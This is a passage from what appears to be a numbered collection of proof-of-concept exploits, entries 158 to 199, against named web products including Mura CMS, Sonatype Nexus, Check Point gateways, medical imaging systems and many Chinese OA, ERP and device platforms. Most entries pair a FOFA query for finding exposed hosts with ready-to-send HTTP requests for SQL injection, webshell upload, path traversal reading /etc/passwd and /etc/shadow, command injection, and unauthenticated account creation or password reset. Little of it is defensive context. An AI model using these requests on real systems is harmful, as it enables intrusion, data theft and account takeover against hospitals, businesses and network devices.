
null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 (INFINITT) medical imaging archiving and communication system WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>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</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓 smart parking fee collection system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field sets the file name and the <fileFlow> field carries the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益 value management system DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景 EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景 EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD license plate recognition camera arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和 OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文 engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创 library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0;

Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼 application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体 佳会 video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技 clinical browsing system deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. Short-video matrix marketing system poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通 Electronic Document Security Management System (CDGServer3) NavigationAjax SQL injection (time-based, T-SQL)
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

The request deliberately goes through /js/../ instead of straight to /CDGServer3/NavigationAjax: the dot segment is a common way past a prefix-based authentication filter that exempts static /js/ resources, while the container still resolves the path to the servlet. No session is needed; a vulnerable host answers about 5 seconds late.

192. 富通天下 Foreign-Trade ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<%@ WebHandler Language="C#" Class="AverageHandler" %>
using System;
using System.Web;

public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    {
        get { return true; }
    }

    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

The name query parameter controls the stored file name, so name=.ashx makes the server save the raw request body as an ASP.NET handler; requesting the stored .ashx returns test.

193. 山石网科 (Hillstone) 云鉴 Security Management System setSystemTimeAction command execution
FOFA:body="山石云鉴主机安全管理系统"
1. Obtain a CSRF token; the POC sends an arbitrary PHPSESSID value, so no login is needed:
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host: your-ip
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

2. Substitute the token for {{token}} and send the same PHPSESSID. The param value is evaluated as Python on the server, so os.system() runs a shell command; here it writes a marker file under the web root:
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 97

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

3. Fetch the marker file; a response body of 23333333333456 confirms execution:
GET /master/img/config HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0

194. 飞企互联 FE Enterprise Operations Management Platform uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If GET /servlet/uploadAttachmentServlet returns a response rather than 404, the servlet is exposed and the target is likely vulnerable.
POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

The filename is used unsanitised, so the ../ sequence walks out of the attachment directory into the deployed fe.war; the JSP should then be reachable as /hello.jsp under the application root and print hello.

195. 飞鱼星 Enterprise Internet Behavior Management System send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

The name value is spliced into a shell command line, so the ; terminators inject uname -a; on a vulnerable device the kernel banner comes back in the response. Note that the body is JSON even though the Content-Type says form-urlencoded; send it as shown.

196. 河南省风速科技 Unified Authentication Platform password reset (resetPasswordBySuper)
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host: your-ip
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

The administrative reset endpoint is reachable without a session: xgh is the account identifier (staff/student number) and newPass the password that gets set, so any known account can be taken over.

197. 浙大恩特 Customer Resource Management System Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

The ;.js suffix is a path parameter: an authentication filter that whitelists .js resources sees a static file, while the servlet mapping ignores everything after the semicolon. The injected UNION ALL SELECT 111*111 evaluates to 12321, which is the value to look for in the response.

198. 阿里云盘 WebDAV (aliyundrive-webdav LuCI app) command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Host: your-ip
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

The sid value decodes to `ls />/www/aaa.txt` and is substituted into a shell command, so the backticks run ls and write its output into the OpenWrt web root, where it can then be fetched as /aaa.txt. The request carries a LuCI sysauth cookie, so this is post-authentication: an attacker needs a valid router login first.

199. Cockpit CMS assetsmanager/upload file upload
FOFA:title="Authenticate Please!"
1. Request the login page to obtain the csfr token:
GET /auth/login?to=/ HTTP/1.1
Host: your-ip

Response: 200; the page contains csfr:"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Log in with that token to obtain a session cookie (the POC uses the default credentials admin/admin, so this only works where they have not been changed):
POST /auth/check HTTP/1.1
Host: your-ip
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200 with
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

3. Upload a PHP file with that session; the asset manager accepts the .php extension:
POST /assetsmanager/upload HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
